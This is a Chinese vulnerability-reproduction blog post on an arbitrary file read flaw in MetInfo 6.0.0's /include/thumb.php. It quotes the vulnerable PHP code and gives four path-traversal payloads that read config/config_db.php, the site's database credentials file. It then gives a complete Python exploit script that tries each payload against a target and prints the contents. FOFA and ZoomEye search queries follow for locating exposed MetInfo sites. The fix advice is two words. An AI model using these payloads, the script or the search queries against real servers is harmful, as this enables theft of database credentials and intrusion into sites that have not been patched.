当前位置: 首页 > news >正文

【漏洞复现】Metinfo6.0.0任意文件读取漏洞复现

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

      • 1.1、漏洞描述
      • 1.2、漏洞等级
      • 1.3、影响版本
      • 1.4、漏洞复现
        • 代码审计
        • 漏洞点
      • 1.5、深度利用
        • EXP编写
      • 1.6、漏洞挖掘
      • 1.7修复建议

1.1、漏洞描述

漏洞名称:MetInfo任意文件读取

漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的/app/system/include/module/old_thumb.class.php文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件。

下载地址:历史版本安装文件下载 Ver_6.0.0

1.2、漏洞等级

高危

1.3、影响版本

在这里插入图片描述

影响版本:MetInfo 6.0.0

1.4、漏洞复现

代码审计
defined('IN_MET') or exit('No permission');load::sys_class('web');class old_thumb extends web{public function doshow(){global $_M;$dir = str_replace(array('../','./'), '', $_GET['dir']);if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){header("Content-type: image/jpeg");ob_start();readfile($dir);ob_flush();flush();die;}

$dir = str_replace(array(‘…/’,‘./’), ‘’, $_GET[‘dir’]);

dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将.././替换成空值

readfile($dir);

漏洞点
/include/thumb.php

使用bp进行抓包

在这里插入图片描述

测试一:

/include/thumb.php?dir=..././http/..././config/config_db.php

测试二:

/include/thumb.php?dir=.....///http/.....///config/config_db.php

测试三:

/include/thumb.php?dir=http/.....///.....///config/config_db.php

测试四:

/include/thumb.php?dir=http\..\..\config\config_db.php# 此POC 仅适用于Windows 系统,Linux 下无效  
#    只有windows以右斜杠作为文件路径分隔符

在这里插入图片描述

1.5、深度利用

EXP编写
import requests
import sysbanner = """
MetInfo 6.0.0___________.__.__           __________                   .___\_   _____/|__|  |   ____   \______   \ ____ _____     __| _/|    __)  |  |  | _/ __ \   |       _// __ \\__  \   / __ | |     \   |  |  |_\  ___/   |    |   \  ___/ / __ \_/ /_/ | \___  /   |__|____/\___  >  |____|_  /\___  >____  /\____ | \/                 \/          \/     \/     \/      \/ Usage: python3 *.py http://192.168.80.139/MetInfo6.0.0/
"""headers = {"User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}dir_list = ["..././http/..././config/config_db.php",".....///http/.....///config/config_db.php","http/.....///.....///config/config_db.php","http\..\..\config\config_db.php"
]def attack(host):vul = "/include/thumb.php"url = host + vulres = requests.get(url = url, headers = headers)if res.status_code != 200:print(f"[INFO] {vul} is Not Exists!")exit()print(f"[INFO] {vul} is Exists!")for param in dir_list:params = {"dir":  param }res = requests.get(url = url, params = params, headers = headers)print(f"[INFO] Test URL: {res.url}")if "<?php" in res.text:print("[RESULT] The target is vulnreable!")print(f"[RESULT]\n{res.text}")breakif len(sys.argv) < 2:print(banner)exit()host = sys.argv[1]attack(host = host)

在这里插入图片描述

1.6、漏洞挖掘

FOFA

app="metinfo"

ZoomEye

app:"MetInfo"
app:"MetInfo"+os:"Windows"

1.7修复建议

  • 升级
  • 打补丁
http://www.lryc.cn/news/220081.html

相关文章:

  • 3.22每日一题(二重积分求平面区域面积)
  • Hadoop环境搭建
  • SpringBoot_mybatis-plus使用json字段
  • 牛客出bug(华为机试HJ71)
  • 第十一章 日志管理
  • 灯串跨境外贸出口欧美CE认证和UL588报告周期解析
  • 大数据中的分布式文件系统MapReduce的选择题
  • storm安装手册及笔记
  • vue 视频流播放
  • Azure 机器学习 - 使用Python SDK训练模型
  • C#成员属性代码示例
  • 3、Dockerfile 深入与其他细节
  • 大数据之陌陌聊天数据分析案例
  • 03 贝尔曼公式
  • 学习视频剪辑:批量添加srt字幕,让视频更生动
  • Windows桌面便签工具推荐使用哪一款?
  • 【微信小程序】自定义组件(二)
  • llinux的更目录下的文件作用和举例
  • 20231106_抽象类abstract
  • yolov5 obb旋转框 tensorrt部署
  • http中的Content-Type类型
  • 【C语法学习】17 - fwrite()函数
  • CWE(Common Weakness Enumeration,通用缺陷枚举)
  • 华为政企视频会议产品集
  • IntelliJ IDEA 2022创建Maven项目
  • 有限域的Fast Multiplication和Modular Reduction算法实现
  • 第八章:security testing
  • Linux系统下一些配置建议整理
  • 【launch文件中如何启动gdb调试单个节点多个节点】
  • Unity中Shader的GI的直接光实现